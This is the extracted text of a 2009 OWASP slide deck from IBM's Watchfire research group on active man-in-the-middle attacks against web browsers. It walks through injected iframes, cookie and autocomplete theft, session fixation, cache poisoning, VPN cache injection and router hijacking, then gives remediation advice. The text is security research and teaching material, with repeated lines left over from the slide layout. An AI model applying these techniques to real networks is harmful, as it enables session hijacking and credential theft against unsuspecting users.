A mit m

1

IBM Rational Application Security Group (aka Watchfire)

Web Based Man In the Middle Attack © 2009 IBM Corporation

Active Man in the Middle Attacks

The OWASP Foundation

OWASP

http://www.owasp.org

27/02/2009

Adi Sharabani

Security Research Group ManagerIBM Rational Application Security (a.k.a. Watchfire)

adish

2



Agenda

Background– Man in the Middle

– Network level – heavily researched

– Web application level – sporadic research

Outline– Passive MitM attacks

– Active MitM attacks

– Penetrating an internal network

– Remediation

3



Man in the Middle Scenario

All laptop users connect to a public network

Wireless connection can easily be compromised or impersonated

Wired connections might also be compromised

InternetInternet

4



Rules of Thumb – Don’ts …

Someone might be listening to the requests– Don’t browse sensitive sites

– Don’t supply sensitive information

Someone might be altering the responses– Don’t trust any information given on web sites

– Don’t execute downloaded code

5



Rules of Thumb – What Can You Do?

This leaves us with:

– Browse your favorite news site

– Browse your favorite weather site

InternetInternetNon-sensitive sites

Boring

Non-sensitive sites

Boring

Sensitive sites

Interesting

Sensitive sites

Interesting

6



You are still vulnerable

7



Mitigating a Fallacy

Fallacy–Executing JavaScript on victim == executing an attack

Reality–Same origin policy

–Executing an attack

–JavaScript + browser implementation bug –JavaScript + execution on a specific domain

– Can be done through XSS

8



Passive Man in the Middle Attacks

Victim browses to a website

Victim browses to a website

Attacker views the requestmanipulates it

and forwards to server

Attacker views the requestmanipulates it

and forwards to server

Attacker views the responsemanipulates it

and forwards to victim

Attacker views the responsemanipulates it

and forwards to victimServer returns a response Server returns a response

Other servers are not affectedOther servers are not affected

9



Active Man in the Middle Attack

The attacker actively directs the victim to an “interesting” site The IFrame could be invisible

Victim browses to a “boring” site

Victim browses to a “boring” site

Attack transfers the request to the

server

Attack transfers the request to the

server

Attacker adds an IFRAME referencing an “interesting” site

Attacker adds an IFRAME referencing an “interesting” site Server returns a response Server returns a response

My Weather ChannelMy Weather Channel

My Bank SiteMy Bank Site

Automatic request sent to the interesting server


My Bank SiteMy Bank Site

Other servers are not affectedOther servers are not affected

10



11



Stealing Cookies*

Automatic request contains victim’s cookies

Automatic request contains victim’s cookies

Obvious result Stealing cookies associated with any domain attacker desires Will also work for HTTP ONLY cookies

(as opposed to XSS attacks)

* A similar attack was presented by Mike Perry – SideJacking

12



Demo

13



Overcoming Same Origin Policy

Attacker adds a malicious scriptto the response

Attacker adds a malicious scriptto the response

Attacker forwards the automatic request to the

“interesting” server

Attacker forwards the automatic request to the

“interesting” serverScript executes with the “interesting” server’s restrictions

Script executes with the “interesting” server’s restrictions

“Interesting” server returns a response

“Interesting” server returns a response

Attacker injects an IFRAME directing to an “interesting”

site

Attacker injects an IFRAME directing to an “interesting”

site

Victim surfs to a “boring” site

Victim surfs to a “boring” site



Result– Attacker can execute scripts on any domain she desires

– Scripts can fully interact with any “interesting” website Limitations

– Will only work for non SSL web sites

14



Secure Connections

Login Mechanism

15



Secure ConnectionsPlease LoginPlease Login

UsernameUsernamePasswordPassword

SUBMIT

jsmith

********

SUBMITVictim browses to site

http://www.webmail.site

Victim browses to sitehttp://www.webmail.site

Site returns a response with login form

Site returns a response with login form

Victim fills login details,and submits the form

Victim fills login details,and submits the form

Login request is sent through a secure channel

Login request is sent through a secure channel

Login SuccessfulLogin Successful

Hello John Smith,

Pre-login action sent in clear text Attacker could alter the pre-login response to make the login

request sent unencrypted

16



Stealing Auto Completion Information

Script accesses the auto-completion information using the DOM

Script accesses the auto-completion information using the DOM

Attacker redirect victim to a request to a pre-login page

Attacker redirect victim to a request to a pre-login page

Attacker returns the original login form together with a malicious

script

Attacker returns the original login form together with a malicious

script

* A passive version of this attack was described by RSnake in his blog

Result– Attacker can steal any auto-completion information she desires

Limitations– Will only work for pre-login pages not encrypted

– Will not work seamlessly in IE

17



Demo

18



Broadening the Attack(Time Dimension)

19



Passive MitM Attacks

Active MitMAttacks

Active MitMAttacks

Active MitMAttacks

Active MitMAttacks

Present(“boring” sites)

Present(“boring” sites)

Past(“interesting” sites)

Past(“interesting” sites)

Future(“interesting” sites)

Future(“interesting” sites)

20



Session Fixation

Cookie is being saved on victim’s computer

Cookie is being saved on victim’s computer

Attacker redirects victim to the site of interest


Attacker returns a page with a cookie generated by server

Attacker returns a page with a cookie generated by server

A while later,victim connects to the site

(with the pre-provided cookie)

A while later,victim connects to the site

(with the pre-provided cookie)

Attacker uses the same cookie to connect to the server

Attacker uses the same cookie to connect to the server

Server authenticates attacker as victim

Server authenticates attacker as victim

Result– Attacker can set persistent cookies on victim

Limitations– The vulnerability also lies within the server

21



Cache Poisoning

Page is being cached onvictim’s computer

Page is being cached onvictim’s computer


Attacker redirects victim to the site of interestAttacker returns a malicious page

with cache setting enabled

Attacker returns a malicious page with cache setting enabled

A while later,victim visits the site

A while later,victim visits the site

Result– Attacker can poison any page she desires

– Poisoned pages will be persistent Limitations

– Attacker can poison non SSL resources

22



Demo

23



Complex Hacking Virtual Private Networks

24



Virtual Private Networks (VPN)

VPN client initialization– Create a secure network interface

– Set user’s routing table

VPN client finalization (upon exit or when connection is lost) – Revert routing table

Do not confuse VPN and HTTPS architectures!

25



VPN Mixed content

Internal Web SiteInternal Web Site

<html><scriptsrc=http://external/sc.js>...</html>

Result VPN web sites are compromised User is not alerted to the security risk

As opposed to SSL mixed content issues Limitations

Such mixed content is not widely used

Malicious script executes within the secure environment

Malicious script executes within the secure environment

Attacker alters the non-encrypted script

Attacker alters the non-encrypted script

Victim surfs to a page in the VPN network

Victim surfs to a page in the VPN network

26



Hacking Non-Available Sites

Result Attacker can view and change any HTTP cache object Even for non available sites

27



VPN Cache Injection

Attacker disconnects connection to VPN Server

Attacker disconnects connection to VPN Server

After routing table is updated, Attacker poisons the cache of

an internal site

After routing table is updated, Attacker poisons the cache of

an internal siteAttacker recovers connectionAttacker recovers connection

Cached resource loads and malicious cached script executes

Cached resource loads and malicious cached script executes

Attacker redirects victim to cached resource

Attacker redirects victim to cached resource

Result VPN is great for the network level VPN is not enough for the application level

This attack could be applied to other application protocols!

28



Complex Hacking Intranet Networks

29



Penetrating Internal Network – Simple Cache Poison

Result Attack will be launched every time victim accesses the resource The attack would executed within the local intranet

Characteristics Firewall protections are helpless Affected servers will never know The attack is persistent

30



Setting Up a Future MitM Scenario

Result Facilitates future MitM scenarios Does not require router’s credentials Fake settings could be displayed to the user

Limitations Requires victim to access router in the future Need to guess router’s address (10.0.1.1)

Using Active MitM Techniques, attacker poisons victim’s cache

related to his router’s web access

Using Active MitM Techniques, attacker poisons victim’s cache

related to his router’s web access

Router

Victim’s router related cache poisoned with a malicious script

Victim’s router related cache poisoned with a malicious script

Script hides the configuration changes

Script hides the configuration changes

Malicious script executedwhen victim tries to access router

Malicious script executedwhen victim tries to access router Script configures router to tunnel

future communication through attacker

Script configures router to tunnel future communication through

attacker

Outbound Proxy IP Address 216 187 118 221. . .

Primary DNS Server Address 216 187 118 221. . .

31



Increasing the Exposure

Poison common home pages– Script will execute every time victim opens his browser

Poison common scripts– Script will execute on every page using the common script

– Example: http://www.google-analytics.com/ga.js

The “double active” attack– Common poisoned page redirects to another poisoned resource

..JSJS

32



The Double Active Cache Poisoning Attack

Using Active MitM techniques,attacker poisons common

router’s address (i.e. 10.0.1.1)

Using Active MitM techniques,attacker poisons common

router’s address (i.e. 10.0.1.1)

At a later time,Victim opens browser

At a later time,Victim opens browser

Cached home page is loaded and redirects victim’s browser to

router’s web interface

Cached home page is loaded and redirects victim’s browser to

router’s web interface

Cached router’s web interface is loaded and malicious script changes router’s settings

Cached router’s web interface is loaded and malicious script changes router’s settings

Result Internal network has been compromised

Limitation Need to guess router IP and credentials

Attacker also poisons common home pages

Attacker also poisons common home pages

Router

Router is compromised by malicious script

Router is compromised by malicious script

33



Active Attack Characteristics

–Not noticeable in user’s experience

–Not noticeable by any of the web sites

–IPS/IDS will not block it–Can be persistent

–Can be used to hack into local organization

–Bypasses any firewall or VPN–Can be used with DNS Pinning Techniques

–A problem with the current design

–Requires only one plain HTTP request to be transmitted

34



Remediation

Users–Do not use auto-completion

–“Clean Slate Policy”

–Trust level separation

–Two different browsers–Two different users–Two different OS –Virtualization products

–Tunnel communication through a secure proxy– Might not be allowed in many hot-spots

35



Web owners–Consider risks of partial SSL sites

–Do not consider secure VPN connection as an SSL replacement

–Use random tokens for common scripts

– While considering performance issues

– Avoid referring external scripts from internal sites

36



Industry–Build integrity mechanism for HTTP

–Secure WiFi networks

37



Summary

Active MitM attacks– broaden the scope of the passive attacks– Design issues

– Dimension of time

– Past (steal cookies, auto-completion information, cache)

– Future (set up cookies, poison cache, poison form filler)

– Penetrating internal networks

– Persistent

– Bypass any current protection mechanisms

More information:– Paper and presentation will be uploaded to our blog:

http://blog.watchfire.com

38



References

Watchfire’s Blog: http://blog.watchfire.com Wireless Man in the Middle Attacks:

– http://www.informit.com/articles/article.aspx?p=353735&seqNum=7

SideJacking:– http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html

More on SideJacking:– http://erratasec.blogspot.com/2008/01/more-sidejacking.html

Active SideJacking:– http://seclists.org/bugtraq/2007/Aug/0070.html

Surf Jacking– http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf

Stealing User Information:– http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/

39



Thank you!

Date post:	15-Aug-2015
Category:	Engineering
Upload:	parsa-danesh
View:	17 times
Download:	0 times

A mit m

Engineering